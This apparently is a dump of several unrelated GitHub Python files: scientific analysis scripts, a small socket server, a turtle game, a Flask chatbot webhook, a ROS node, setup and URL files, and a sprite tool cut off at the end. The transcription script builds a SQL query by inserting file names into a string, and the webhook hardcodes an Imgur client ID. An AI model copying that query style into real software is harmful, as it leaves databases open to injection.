np.dot(second_log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution_discrete*deltaDist)*deltaW1\n\nprint(inflection_slope_difference(t_inflection, W1_fit_points, 
W1_distribution_discrete, deltaDist, deltaW1)/0.13902848935038245)\n\n###################################################################################\n\n#185996278\n\n# np.rint(1/(deltaW1*deltaDist)) - 185996278\n\n# normalization_check(W1_distribution_discrete, deltaW1)\n\n\n# np.sum(W1_distribution_discrete) - 185996278\n\ndef renormalization(discrete_distribution):\n discrete_distribution = discrete_distribution / (np.sum(discrete_distribution) * (deltaW1*deltaDist))\n for i in range(0,len(discrete_distribution)):\n discrete_distribution[i] = int(np.rint(discrete_distribution[i]))\n return discrete_distribution\n\n###################################################################################\n\n#W1peak\n# def perturbation(distribution, peak_value):\n# for j in range(0,len(distribution)):\n# if j < peak_value:\n\n# else:\n\n#perturb slightly the distribution somewhere\n\n###################################################################################\n# counter=0\n# deviations_second=[0]\n# while( (counter < 25) and (len(deviations_second)!=0) ):\n\ndef numerical_difference(discrete_distribution):\n difference = [ (discrete_distribution[j+1] - discrete_distribution[j]) for j in range(0,len(discrete_distribution) -1) ]\n difference.insert(0,0)\n while (len(difference) < len(discrete_distribution)):\n difference.append(0)\n difference = np.array(difference)\n return difference\n\nDifference_first = numerical_difference(W1_distribution_discrete)\n\n# Difference_second = [ (Difference_first[j+1] - Difference_first[j-1]) for j in range(1,number_of_columns -1) ] #2*W1_distribution_discrete[j] + \n# Difference_second.insert(0,0)\n# Difference_second.insert(number_of_columns,0)\n# Difference_second = np.array(Difference_second)\n\nDifference_second = numerical_difference(Difference_first)\n\n###################################################################################\n\ndef monotonicity_check(discrete_distribution, peak_point):\n monotonicity_list = []\n for j in range(0, peak_point):\n if (discrete_distribution[j] <= -1):\n monotonicity_list.append(j)\n for j in range(peak_point+1, len(discrete_distribution)):\n if (discrete_distribution[j] >= 1):\n monotonicity_list.append(j)\n return monotonicity_list\n\n###################################################################################\n###################################################################################\n\nx_transition1 = 0.065213865307513286845\n\nx_transition2 = 0.43783397651520976759\n\nif (inflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) < 0):\n if (inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) > slope_at_inflection):\n print('Area 2')\n else:\n print('Area 1')\nelse:\n if (inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) > slope_at_inflection):\n print('Area 3')\n else:\n print('Area 4')\n\nmax_index = np.argmax(W1_distribution_discrete)\nW1_distribution_discrete[np.floor_divide(max_index*9,10)] += 2\n\n###################################################################################\n\ndef difference_first_check(discrete_distribution, peak_point):\n result=[]\n for j in range(0, peak_point):\n if ( Difference_first[j] > 1 ):\n result.append(j)\n return result\n\ncounter = 1\nwhile True:\n Difference_first = numerical_difference(W1_distribution_discrete)\n monotonicity = monotonicity_check(Difference_first, max_index)\n deviations_first_indices = 
difference_first_check(Difference_first, max_index)\n\n if ( (len(monotonicity) == 0) and (len(deviations_first_indices) == 0) ):\n break\n else:\n if ((len(monotonicity) > 0)):\n for k in monotonicity:\n if k < max_index:\n W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n # else:\n # W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n if ((len(deviations_first_indices) > 0)):\n for k in deviations_first_indices:\n if k < max_index:\n W1_distribution_discrete[k-1] += 1\n # else:\n # W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n\n print(counter)\n counter+=1\n\nprint(monotonicity)\n\nW1_distribution_discrete = renormalization(W1_distribution_discrete)\n\ninflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)\ninflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)\n\n#185996278\n# np.sum(W1_distribution_discrete) - 185996278\n\n# Difference_first[monotonicity[0]]\n# W1_distribution_discrete[monotonicity[0]]\n\n###################################################################################\n\ndeviations_first, deviations_first_count = np.unique(Difference_first, return_counts=True)\ndeviations_second, deviations_second_count = np.unique(Difference_second, return_counts=True)\n\nfor k in [-1, 0, 1]:\n deviations_first = np.delete(deviations_first, np.where(deviations_first == k))\n deviations_second = np.delete(deviations_second, np.where(deviations_second == k))\n\nif len(deviations_second)>0:\n deviations_first_indices={}\n deviations_second_indices={}\n for k in deviations_first:\n result = np.nonzero(Difference_first == k)\n deviations_first_indices[k] = result\n for j in deviations_second:\n result = np.nonzero(Difference_second == j)\n deviations_second_indices[j] = result\n\nlist(deviations_first_indices[2])[0]\n\n###################################################################################\n\n# # # #so we need to focus on 21419 because of the way Difference_first has been set up\n\n# for k in deviations_first:\n# print(list(deviations_first_indices[k][0])[0])\n\n# W1_distribution_discrete[2380]\n\n# if index_first < max_index:\n# if W1_distribution_discrete[index_first-1] < W1_distribution_discrete[index_first]-1:\n# W1_distribution_discrete[index_first-1] = W1_distribution_discrete[index_first]-1\n# if W1_distribution_discrete[index_first+1] < W1_distribution_discrete[index_first]:\n# W1_distribution_discrete[index_first+1] = W1_distribution_discrete[index_first]\n\n###################################################################################\n\n#Quick plot test\nfig, ax = plt.subplots()\n\n# ax.scatter(W1_fit_points, Difference_second, s=20, color='green')\n# ax.scatter(W1_fit_points, Difference_second, s=20, color='red')\n\nax.scatter(W1_fit_points, W1_distribution, s=20, color='red')\nax.scatter(W1_fit_points, W1_distribution_discrete*deltaDist, s=20, color='green')\n\nax.grid()\n\nax.set(xlabel='Relaxation rates (1/s)', ylabel='', title='Probability distribution of the relaxation rates')\n\n#fig.savefig('NMR-Nematic-Scaling\\Output_Files\\Test_of_construction_triangular_distribution_T=30K.png')\n# plt.xlim(73, 
75)\nplt.show()\n\n###################################################################################","repo_name":"Stylianos29/NMR-Nematic-Scaling","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42337672872","text":"import socket;\n\nHOST = '127.0.0.1';\nPORT = 56901;\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);\n s.bind((HOST, PORT));\n s.listen();\n while True:\n conn, addr = s.accept();\n with conn:\n print(f'Conectado com {addr}');\n\n altura, sexo = conn.recv(1024).decode().split(','); \n\n if sexo == 'masculino':\n pesoIdeal = 72.7 * float(altura) - 58;\n else:\n pesoIdeal = 62.1 * float(altura) - 44.7;\n\n resposta = f'O peso ideal é {round(pesoIdeal, 2)}';\n\n conn.sendall(resposta.encode());\n conn.close();","repo_name":"Sistemas-Distribuidos-2022-1/Abrao-Rodrigues","sub_path":"Laboratório-1/ex-04/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7785505027","text":"#16a_c3.py\r\n#대포 조절\r\n\r\nimport turtle as t\r\nimport random\r\n\r\n#변수 초기화\r\nl=50\r\n\r\ndef reset_cannon(t_ang):\r\n t.color('black')\r\n t.goto(-200, 10)\r\n t.setheading(t_ang)\r\n \r\ndef turn_up():\r\n t.left(2)\r\n\r\ndef turn_down():\r\n t.right(2)\r\n\r\ndef fire():\r\n ang=t.heading()\r\n while t.ycor()>0:\r\n t.forward(15)\r\n t.right(5)\r\n #print(f'x:{t.xcor()}, y:{t.ycor()}')\r\n\r\n # 타겟 충돌 확인\r\n d=t.distance(tx, 0)\r\n if d<= l/2:\r\n t.color('blue')\r\n t.write('Good!', False, 'center', ('D2cording', 15))\r\n else:\r\n t.color('red')\r\n t.write('Bad!', False, 'center', ('D2cording', 15))\r\n reset_cannon(ang)\r\n \r\n#바닥 그리기\r\nt.goto(300, 0)\r\nt.goto(-300, 0)\r\n\r\n#타겟그리기\r\ntx=random.randint(50, 150)\r\n\r\nt.color('green')\r\nt.pensize(5)\r\nt.up()\r\nt.goto(tx - l/2, 3)\r\nt.down()\r\nt.goto(tx + l/2, 3)\r\n\r\n# 대포 초기화\r\nt.up()\r\nreset_cannon(20)\r\n\r\n# 키입력 처리\r\nt.onkeypress(turn_up, 'Up')\r\nt.onkeypress(turn_down, 'Down')\r\nt.onkeypress(fire, 'space')\r\nt.listen()\r\n","repo_name":"09jason1110/python","sub_path":"16a_c3.py","file_name":"16a_c3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3491291328","text":"from mpvr.datamodule.manager import Manager as dm\nfrom mpvr.utils.process import *\nimport numpy as np\nimport pandas as pd\ndm = dm.from_config(dm.section_list()[1])\n\nS3 = [x for x in dm.get_scenarios() if 'S3' in x]\nhistograms = [np.zeros(5**6), np.zeros(36)]\nfor scenario in S3:\n print(scenario)\n dm.set_scenario(scenario)\n make_histogram(dm.get_motion_visual_tuple_gen(), histograms)\n\nfor histogram in histograms:\n histogram /= np.sum(histogram)\n\nmpe = []\nincidences = []\nfor scenario in S3:\n print(scenario)\n dm.set_scenario(scenario)\n if scenario in ['S3_surge', 'S3_sway', 'S3_surge', 'S3_sway', 'S3_surge', 'S3_sway', 'S4', 'S5', 'S6']:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms,\n factor = 0.1)):\n mpe.append(x)\n else:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms)):\n mpe.append(x)\n dm._load_incidence_data()\n for _incidence in dm._incidence:\n 
incidences.append(_incidence)\nincidences = np.array(incidences)\nmpe = np.array(mpe)\n# correlation results per scenario; the dict must exist before the first assignment below\ncor = {}\ncor['S3'] = correlation(incidences, mpe)\nindices = mpe > np.quantile(mpe, 0.75)\ncor['S3_q1'] = correlation(incidences[indices], mpe[indices])\n\nmpe = np.array(mpe)\ntimes = np.linspace(1.0/3, 110, 110*3)\npath = dm._setting.save_result_path + 'MPEntropy/table/total/S3.csv'\ndf = pd.DataFrame(mpe, times)\ndf.index.name = 'Time'\ndf.columns = ['MP entropy']\ndf.to_csv(path)\n\nfig, axes = dm.fig_setup(2, ['MP Entropy', 'Incidence'], np.arange(0, 114, 2), times = times)\n\ndm.ax_color_by_value(axes[0], times, mpe, 0)\naxes[0].set_ylim([-200000, 200000])\naxes[1].bar(times, incidences, width=0.2)\ndm.fig_finalize(tag='mpe', file_name='S3', remark_dir='total/')\n\n\n\nS6 = ['S6']\nhistograms = [np.zeros(5**6), np.zeros(36)]\nfor scenario in S6:\n    print(scenario)\n    dm.set_scenario(scenario)\n    make_histogram(dm.get_motion_visual_tuple_gen(), histograms)\n\nfor histogram in histograms:\n    histogram /= np.sum(histogram)\n\nmpe = []\nincidences = []\nfor scenario in S6:\n    print(scenario)\n    dm.set_scenario(scenario)\n    if scenario in ['S6_surge', 'S6_sway', 'S6_surge', 'S6_sway', 'S6_surge', 'S6_sway', 'S6', 'S6', 'S6']:\n        for x in to_mp_entropy(\n                mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n                                         histograms,\n                                         factor = 0.1)):\n            mpe.append(x)\n    else:\n        for x in to_mp_entropy(\n                mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n                                         histograms)):\n            mpe.append(x)\n    dm._load_incidence_data()\n    for _incidence in dm._incidence:\n        incidences.append(_incidence)\nincidences = np.array(incidences)\nmpe = np.array(mpe)\ncor['S6'] = correlation(incidences, mpe)\nindices = mpe > np.quantile(mpe, 0.75)\ncor['S6_q1'] = correlation(incidences[indices], mpe[indices])\n\n\nfor scenario in dm.get_scenarios():\n    print(scenario)\n    dm.set_scenario(scenario)\n    histograms = [np.zeros(5**6), np.zeros(36)]\n    motion_data = np.array([x for x in dm.get_motion_data_gen()])\n\n    mot_vis_gen = dm.make_tuple_gen(\n        dm.get_classified_motion_data_gen(motion_data),\n        dm.get_classified_visual_data_gen())\n    make_histogram(mot_vis_gen, histograms)\n    for hist in histograms:\n        hist /= np.sum(hist)\n\n    mot_vis_gen = dm.make_tuple_gen(\n        dm.get_classified_motion_data_gen(motion_data),\n        dm.get_classified_visual_data_gen())\n    mapped = mapping_src_to_histogram(mot_vis_gen, histograms)\n    mpe = [x for x in to_mp_entropy(mapped)]\n    dm._load_timestamp_data()\n    dm.save_scenario_as_table(mpe, 'mpe', remark_dir='ongame')\n\nfor scenario in dm.get_scenarios():\n    print(scenario)\n    dm.set_scenario(scenario)\n\n    df = dm.get_processed_data('mpe', remark_dir='ongame/')\n    time, mpe_ongame = df['Time'].values, df['MPEntropy'].values\n    df = dm.get_processed_data('mpe')\n    mpe = df['MPEntropy'].values\n    incidence = dm.get_incidence_data()\n\n    fig, axes = dm.fig_setup(2, ['MP Entropy', 'Incidence'], np.arange(0, len(time)/3, 2), times = time)\n    axes[0].plot(time, mpe_ongame, ':', label='After 3D motion')\n    axes[0].plot(time, mpe, label='Before 3D motion')\n    axes[0].legend()\n    axes[0].set_ylim([-300000, 300000])\n    axes[1].bar(time, incidence, width = 0.2)\n    axes[1].set_yticks(np.arange(0, 5, 1))\n    dm.fig_finalize(tag='mpe', remark_dir='ongame/')\n","repo_name":"nearj/mpvr-motionfiltering","sub_path":"test/motiondevice_aug_27.py","file_name":"motiondevice_aug_27.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"25063547195","text":"from flask import Flask, 
request, make_response, jsonify\n\nimport pyimgur\nimport random\n\n\n\n## heroku\ndef morning():\n\n    r = random.randrange(1, 7)\n\n\n    client_id = '0d519e46f026f35'\n    print(r)\n    path = '早安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n    im = pyimgur.Imgur(client_id)\n    upload_image = im.upload_image(path)\n\n    return upload_image.link\n\n\n\ndef afternoon():\n\n    r = random.randrange(1, 8)\n\n    client_id = '0d519e46f026f35'\n    print(r)\n    path = '午安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n    im = pyimgur.Imgur(client_id)\n    upload_image = im.upload_image(path)\n\n    return upload_image.link\n\ndef goodnight():\n\n    r = random.randrange(1, 7)\n\n    client_id = '0d519e46f026f35'\n    print(r)\n    path = '晚安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n    im = pyimgur.Imgur(client_id)\n    upload_image = im.upload_image(path)\n\n    return upload_image.link\n\n\ndef hell():\n\n    r = random.randrange(1, 8)\n\n    client_id = '0d519e46f026f35'\n    print(r)\n    path = '地獄/' + '地獄 ' + '(' + str(r) + ')' + '.jpg'\n\n    im = pyimgur.Imgur(client_id)\n    upload_image = im.upload_image(path)\n\n    return upload_image.link\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\n\ndef webhook():\n    json = request.get_json(silent=True,force=True)\n\n    res_message = {\"fulfillmentText\": None}\n\n    if json['queryResult']['parameters']['any'] == \"菜單\":\n        msg = \"\"\n        msg += \"以下為所有功能:\\n\"\n        msg += \"輸入 早安\\n\"\n        msg += \"輸入 午安\\n\"\n        msg += \"輸入 晚安\\n\"\n        msg += \"輸入 地獄\\n\"\n\n        res_message = {\"fulfillmentMessages\": [ { \"text\": { \"text\": [msg] } } ] }\n\n    elif json['queryResult']['parameters']['any'] == \"早安\":\n\n        msg = morning()\n        res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] }\n\n\n    elif json['queryResult']['parameters']['any'] == \"地獄\":\n\n        msg = hell()\n        res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] }\n\n\n    elif json['queryResult']['parameters']['any'] == \"午安\":\n\n        msg = afternoon()\n        res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] }\n\n    elif json['queryResult']['parameters']['any'] == \"晚安\":\n\n        msg = goodnight()\n        res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] }\n\n    return make_response(jsonify(res_message))\n\n\nif __name__ == \"__main__\":\n    app.run(port=5000)","repo_name":"FCU-D0772451/Car_Accident_Chatbot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"31044129493","text":"import re\nfrom setuptools import find_packages, setup\n\ninstall_requires = [\n    'attrs>=17.2.0',\n    'Django>=1.8',\n    'six>=1.1',\n    'wrapt>=1.10.10,<2',\n]\n\ndocs_require = [\n    'sphinx>=1.4.0',\n]\n\ntests_require = [\n    'bumpversion==0.5.3',\n    'coverage==4.2',\n    'pytest==3.0.5',\n    'pytest-cov==2.5.1',\n    'pytest-django==3.1.2',\n\n    # Linting\n    'isort==4.2.5',\n    'flake8==3.0.3',\n    'flake8-blind-except==0.1.1',\n    'flake8-debugger==1.4.0',\n]\n\nwith open('README.rst') as fh:\n    long_description = re.sub(\n        '^.. start-no-pypi.*^.. 
end-no-pypi', '', fh.read(), flags=re.M | re.S)\n\n\nsetup(\n name='django-aws-xray',\n version='0.2.2',\n description=\"Django AWS X-Ray\",\n long_description=long_description,\n url='https://github.com/mvantellingen/django-aws-xray',\n author=\"Michael van Tellingen\",\n author_email=\"\",\n install_requires=install_requires,\n tests_require=tests_require,\n extras_require={\n 'docs': docs_require,\n 'test': tests_require,\n },\n use_scm_version=True,\n entry_points={},\n package_dir={'': 'src'},\n packages=find_packages('src'),\n include_package_data=True,\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: 1.11',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n zip_safe=False,\n)\n","repo_name":"mvantellingen/django-aws-xray","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"63"} +{"seq_id":"6673240665","text":"class ICAPResponseHeader (object):\n\t__slots__ = ['info', 'version', 'code', 'status', 'headers', 'header_string', 'offsets', 'content_length', 'body_complete']\n\n\tdef __init__ (self, version, code, status, headers, header_string, offsets, content_length, body_complete):\n\t\tself.info = version, code, status\n\t\tself.version = version\n\t\tself.code = code\n\t\tself.status = status\n\t\tself.headers = headers\n\t\tself.header_string = header_string\n\t\tself.offsets = offsets\n\t\tself.content_length = content_length\n\t\tself.body_complete = body_complete\n\n\n\nclass ICAPResponseHeaderFactory (object):\n\tdef __init__ (self, configuration):\n\t\tself.configuration = configuration\n\n\tdef create (self, version, code, status, headers, header_string, offsets, content_length, body_complete):\n\t\treturn ICAPResponseHeader(version, code, status, headers, header_string, offsets, content_length, body_complete)\n","repo_name":"Exa-Networks/exaproxy","sub_path":"lib/exaproxy/icap/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"63"} +{"seq_id":"36136592861","text":"import sys\nimport os\nimport psycopg2\nfrom trancribe2 import *\n#recibe el directorio a analizar y el tipo de archivo que buscara\ndir_path = sys.argv[1]\next_buscada = sys.argv[2]\nfecha_grabacion = sys.argv[3]\n#guarda los archivos que analizara \nres = []\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\nfor path in os.listdir(dir_path):\n if os.path.isfile(os.path.join(dir_path, path)):\n root, extension = os.path.splitext(path)\n #valida que el tipo de archivo sea el buscado\n if extension==ext_buscada:\n res.append(path)\n # llama a la transcripción y almacenamiento en la base de datos\n\n try:\n connection = psycopg2.connect(user=config[\"DEFAULT\"][\"DB_USER\"],\n password=config[\"DEFAULT\"][\"DB_PASSWORD\"],\n host=config[\"DEFAULT\"][\"DB_HOST\"],\n port=config[\"DEFAULT\"][\"DB_PORT\"],\n database=config[\"DEFAULT\"][\"DB_NAME\"])\n cursor = connection.cursor()\n\n query=\"\"\" select count(1) from texto_analizado where archivo= '%s' ;\"\"\"\n #existe_registro = (path)\n query_comp= (query % path)\n 
cursor.execute(query_comp)\n        connection.commit()\n        cuantos = cursor.fetchone()[0]\n        print(cuantos)\n        if cuantos == 0:\n            transcribe(dir_path, path, fecha_grabacion)\n        else:\n            print('Already processed')\n\n    except (Exception, psycopg2.Error) as error:\n        print(\"Error while looking up the record\", error, path)\n    finally:\n        # closing database connection.\n        if connection:\n            cursor.close()\n            connection.close()\n            print(\"Connection closed\")\n#print(res)\n","repo_name":"saea98/analiza_llamadas","sub_path":"inicia_transcripcion.py","file_name":"inicia_transcripcion.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"72818993481","text":"import sys\nfrom global_chem import GlobalChem\n\n# NOTE: 'cheminformatics' is assumed to be provided elsewhere in the extensions\n# package; it is not defined or imported in this snippet\ngc = GlobalChem()\ngc.build_global_chem_network(print_output=False, debugger=False)\nnetwork = gc.network\nnetworkx_graph = cheminformatics.convert_to_networkx(network)\nprint (networkx_graph.nodes.data())\n\n\nimport networkx as nx\n\nfrom vispy import app, scene\nfrom vispy.visuals.graphs import layouts\n\n\ncanvas = scene.SceneCanvas(title='Simple NetworkX Graph', size=(600, 600),\n                           bgcolor='white', show=True)\nview = canvas.central_widget.add_view('panzoom')\n\ngraph = nx.adjacency_matrix(\n    nx.fast_gnp_random_graph(500, 0.005, directed=True))\nlayout = layouts.get_layout('force_directed', iterations=100)\n\nvisual = scene.visuals.Graph(\n    graph, layout=layout, line_color='black', arrow_type=\"stealth\",\n    arrow_size=30, node_symbol=\"disc\", node_size=20,\n    face_color=(1, 0, 0, 0.2), border_width=0.0, animate=True, directed=False,\n    parent=view.scene)\n\n\n@canvas.events.draw.connect\ndef on_draw(event):\n    if not visual.animate_layout():\n        canvas.update()\n\nif __name__ == '__main__':\n    if sys.flags.interactive != 1:\n        app.run()\n","repo_name":"Global-Chem/global-chem","sub_path":"global_chem_extensions/global_chem_extensions/cheminformatics/applications/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"63"}
{"seq_id":"35363610595","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    # NOTE: the '<int:...>' converters below are reconstructed placeholders; the\n    # original converter names were lost in extraction and are inferred from the view names\n    path('channel/<int:channel_id>/', views.channel_detail, name='channel_detail'),\n    path('channel/<int:channel_id>/videos/', views.channel_videos, name='channel_videos'),\n    path('videos/<int:video_id>/', views.video_detail, name='video_detail'),\n    path('videos/<int:video_id>/comments/', views.video_comments, name='video_comments'),\n    path('channel/<int:channel_id>/history/', views.channel_history, name='channel_history'),\n    path('videos/<int:video_id>/history/', views.video_history, name='video_history'),\n]\n","repo_name":"npoptomov/youtube_app","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"18082587758","text":"import heapq\nfrom collections import Counter\nfrom itertools import chain\n\n\nclass Node:\n\n    def __init__(self, val, freq):\n        self.val = val\n        self.freq = freq\n\n    def __lt__(self, other):\n        # inverted comparison so heapq's min-heap behaves as a max-heap on frequency\n        return self.freq > other.freq\n\n    def __str__(self):\n        return 'val = {}, freq = {}'.format(self.val, self.freq)\n\ndef topKFrequent(nums, k):\n\n    \"\"\"\n    O(n + k log n) solution using a max-heap: heapify all counts, then pop k times.\n    \"\"\"\n\n    counts = Counter(nums)\n    r = []\n    o = []\n    for key, count in counts.items():\n        r.append(Node(key, count))\n\n    heapq.heapify(r)\n    while k:\n        o.append(heapq.heappop(r).val)\n        k = k - 1\n    return o\n\n\n\ndef topKFrequentV2(nums, k):\n    \"\"\"\n    O(n) solution using frequency buckets.\n    \"\"\"\n    n = len(nums)\n    # frequencies range from 1 to n, so n + 1 buckets are needed\n    bucket = [[] for _ in range(n + 1)]\n    for key, freq in Counter(nums).items():\n        bucket[freq].append(key)\n    return list(chain(*bucket))[-k:]\n\n\n# nums = [3, 2, 1, 4]\n# k = 2\n\nnums = [1,1,1,2,2,3]\nk = 3\n\n\n#\n# nums = [1]\n# k = 1\n\nprint(topKFrequent(nums, k))\nprint(topKFrequentV2(nums, k))\n\n","repo_name":"kaynaat007/mydspractice","sub_path":"ds/heap_questions/top_k_frequent_347.py","file_name":"top_k_frequent_347.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"24424418853","text":"#!/usr/bin/env python3\nimport rospy\nfrom odometry_hw.msg import Pose2D\nfrom odometry_hw.msg import DistWheel\nfrom math import sin,cos\n\nclass odometry:\n    def __init__(self):\n        rospy.Subscriber(\"/dist_wheel\", DistWheel, self.callback)\n        self.pub = rospy.Publisher(\"/pose\", Pose2D, queue_size=10)\n        self.x = 0\n        self.y = 0\n        self.theta = 0\n\n    def callback(self, distance):\n        pose = Pose2D()\n        dist_right = distance.dist_wheel_right\n        dist_left = distance.dist_wheel_left\n        delta_s = (dist_right + dist_left) / 2\n        delta_theta = (dist_right - dist_left) / 0.1\n        delta_x = delta_s * cos(self.theta + (delta_theta/2))\n        delta_y = delta_s * sin(self.theta + (delta_theta/2))\n        self.x = self.x + delta_x\n        self.y = self.y + delta_y\n        self.theta = self.theta + delta_theta\n        pose.x = self.x\n        pose.y = self.y\n        pose.theta = self.theta\n        self.pub.publish(pose)\n\nif __name__ == '__main__':\n    rospy.init_node('homework6' , anonymous=True)\n    odometry()\n\n    rospy.spin()\n","repo_name":"nayeyoni/nayeyoni-EECE5560","sub_path":"packages/odometry_package/src/homework6.py","file_name":"homework6.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"28287390592","text":"\"\"\"\r\nTo check if\r\nfetch_desc_bestbuy in FetchDescription\r\nworks properly\r\n\"\"\"\r\n\r\nfrom source.web_scrappers.FetchDescription import FetchDescription\r\nimport sys\r\nsys.path.append('./')\r\n\r\n\r\ndef test_fetch_description_bestbuy():\r\n    link 
= \"https://www.bestbuy.com/site/dyson-outsize-total-clean-cordless-vacuum-nickel-red/6451332.p?skuId=6451332\"\r\n fd = FetchDescription(link)\r\n assert fd.fetch_desc_bestbuy() == \"dyson outsize total clean cordless vacuum nickel red\"\r\n\r\n\r\n\"\"\"\r\nlink = \"https://www.bestbuy.com/site/dyson-outsize-total-clean-cordless-vacuum-nickel-red/6451332.p?skuId=6451332\"\r\nfd = FetchDescription(link)\r\nprint(fd.fetch_desc_bestbuy())\r\n\"\"\"\r\n","repo_name":"piyush1prasad/proj2","sub_path":"test/test_fetch_desc_bestbuy.py","file_name":"test_fetch_desc_bestbuy.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71063796041","text":"import tkinter as tk\r\nimport retrofunctions\r\nimport config\r\nimport retroclasses\r\nimport math\r\n\r\ndef findOrColor (csprites,app):\r\n # This function finds which is the best pixel to or according to the palette colors\r\n # This is used on MSX2 -> See https://www.msx.org/wiki/The_OR_Color\r\n numcols = len(csprites)\r\n c=[-1,-1,-1]\r\n pc=[-1,-1,-1,False]\r\n finalcolors = csprites[:]\r\n #Swap colors if orde color is in the list \r\n if numcols > 2:\r\n if csprites[0] in app.oredcolors:\r\n finalcolors[2]= csprites[0]\r\n finalcolors[1]= csprites[1]\r\n finalcolors[0]= csprites[2]\r\n elif csprites[1] in app.oredcolors:\r\n finalcolors[2] = csprites[1]\r\n finalcolors[0] = csprites[0]\r\n finalcolors[1] = csprites[2]\r\n if not int(finalcolors[0])|int(finalcolors[1])==int(finalcolors[2]):\r\n # I need to swap colors\r\n finalcolors = swapColors (app,finalcolors)\r\n if finalcolors == -1:\r\n return finalcolors\r\n if numcols < 5:\r\n # We need to split the sprite\r\n if numcols > 0:\r\n c[0]= int(finalcolors[0])\r\n if numcols > 1:\r\n c[1]= int(finalcolors[1])\r\n if numcols > 2:\r\n c[2]= int(finalcolors[2])\r\n pc[3] = True\r\n pc[0] = c[0]\r\n pc[1] = c[1]\r\n pc[2] = c[2]\r\n\r\n # find candidate for OR'ed color:\r\n if (c[0]|c[2]) == c[1]:\r\n pc[2] = c[1]\r\n pc[0] = c[0]\r\n pc[1] = c[2]\r\n if (c[1]|c[2]) == c[0]:\r\n pc[2] = c[0]\r\n pc[0] = c[1]\r\n pc[1] = c[2]\r\n return pc\r\n\r\ndef swapColors (app,colors):\r\n newcolor = int(colors[0])|int(colors[1])\r\n oldcolor = int(colors[2])\r\n if [oldcolor,newcolor] not in app.swappedTuples:\r\n changeSpriteColors (app,oldcolor,newcolor)\r\n colors[2]= str(newcolor)\r\n app.swappedTuples.append([oldcolor,newcolor])\r\n app.swappedTuples.append([newcolor,oldcolor])\r\n createTempSprites(app)\r\n createFinalSprites(app)\r\n return -1\r\n return colors\r\n\r\ndef changeSpriteColors (app,original,target):\r\n retrofunctions.exchangeColors (app,original,target)\r\n \r\ndef needToOr(csprites,app):\r\n #retruns if there is a need to or the colors or not\r\n toor = False;\r\n for cols in csprites:\r\n pc=findOrColor (cols,app)\r\n if pc == -1:\r\n return pc\r\n if pc[3]:\r\n toor = True\r\n return toor\r\n\r\ndef getSplits(csprites):\r\n #returns the number of sprites that have to be created as a 